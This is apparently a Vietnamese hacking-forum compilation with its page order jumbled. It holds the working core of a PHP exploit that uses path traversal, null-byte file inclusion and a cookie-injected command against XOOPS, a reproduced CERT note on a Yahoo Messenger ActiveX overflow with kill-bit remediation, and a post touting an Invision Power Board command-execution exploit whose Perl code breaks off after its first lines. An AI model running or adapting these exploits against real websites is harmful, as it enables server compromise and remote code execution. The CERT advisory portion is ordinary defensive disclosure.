Nguồn: http://www.kb.cert.org/vuls/id/901852 Vulnerability Note VU#901852 Yahoo Messenger YMailAttach ActiveX control buffer overflow Overview The Yahoo Messenger YMailAttach ActiveX con
Trang 1" / / / / / / / / / /var/log/access_log",
" / / / / / / / / / /var/log/error_log"
);
$xpl= array (
"misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=", "index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]=" );
for ($j=0; $j<=count($xpl)-1; $j++)
{
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Trying with: ".$xpl[$j].$paths[$i]."%00\r\n";
$packet ="GET ".$p.$xpl[$j].$paths[$i]."%00 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"*delim*"))
{
echo "Exploit succeeded \r\n";
$temp=explode("*delim*",$html);
die($temp[1]);
}
}
}
//if you are here
echo "Exploit failed ";
?>
micimacko(HCE)
Yahoo Messenger YMailAttach ActiveX control buffer overflow
Trang 2Nguồn: http://www.kb.cert.org/vuls/id/901852
Vulnerability Note VU#901852
Yahoo Messenger YMailAttach ActiveX control buffer overflow
Overview
The Yahoo Messenger YMailAttach ActiveX control contains a buffer overflow, which could allow a remote, unauthenticated attacker to execute arbitrary code on
a vulnerable system
I Description
Yahoo Messenger is an instant messaging application Yahoo Messenger includes several ActiveX controls The YMailAttach ActiveX control, which is provided by ymmapi.dll, contains a buffer overflow vulnerability
II Impact
By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to
execute arbitrary code with the privileges of the user The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash
III Solution
Apply an update
As specified in the Yahoo Security Update, this issue is addressed in versions of Yahoo Messenger from Nov 2nd 2006 or later Version 2005.1.1.4 or higher of ymmapi.dll contains the fix
Disable the YMailAttach ActiveX control in Internet Explorer
The Yahoo YMailAttach ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID:
Trang 3{AA218328-0EA8-4D70-8972-E987A9190FF4}
More information about how to set the kill bit is available in Microsoft Support Document 240797 Alternatively, the following text can be saved as a REG file and imported to set the kill bit for this control:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{AA218328-0EA8-4D70-8972-E987A9190FF4}]
"Compatibility Flags"=dword:00000400
Disable ActiveX
Disabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities
Instructions for disabling ActiveX in the Internet Zone can be found in the
"Securing Your Web Browser" document
Systems Affected
Vendor Status Date Updated
Yahoo, Inc Vulnerable 15-Dec-2006
References
http://www.cert.org/tech_tips/securi ernet_Explorer
http://messenger.yahoo.com/security_ php?id=120806
Credit
Thanks to Yahoo for reporting this vulnerability
This document was written by Will Dormann
Other Information
Date Public 12/08/2006
Date First Published 12/15/2006 02:31:05 PM
Date Last Updated 12/15/2006
CERT Advisory
Trang 4CVE Name
Metric 27.94
Document Revision 5
Langtuhaohoa(HCE)
Invision Power Board Multiple Vulnerabilities (bài 1)
Trích:
Release Date: 2006-04-26
Critical: Highly critical
Impact: Security Bypass
Cross Site Scripting
Manipulation of data
System access
Where: From remote
Solution Status: Vendor Patch
Software: Invision Power Board 2.x
Hàng nóng đây
Đã test thử ver 2.0.3 , 2.1.4
Đánh giá : Quá nguy hiểm !
Có thể dùng để hack forum , hack server (nếu bảo mật kém!) Khuyến cáo các webmaster nên upgrade patch ngay !
Video xpl0it :
Trích:
Trang 5Video
Code xpl0it = perl :
Code:
#!/usr/bin/perl
## Invision Power Board 2.* commands execution exploit by RST/GHC
## vulnerable versions <= 2.1.5
## tested on 2.1.4, 2.0.2
##
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
use IO::Socket;
use Getopt::Std;
getopts("l:h:p:d:f:v:");
$host = $opt_h;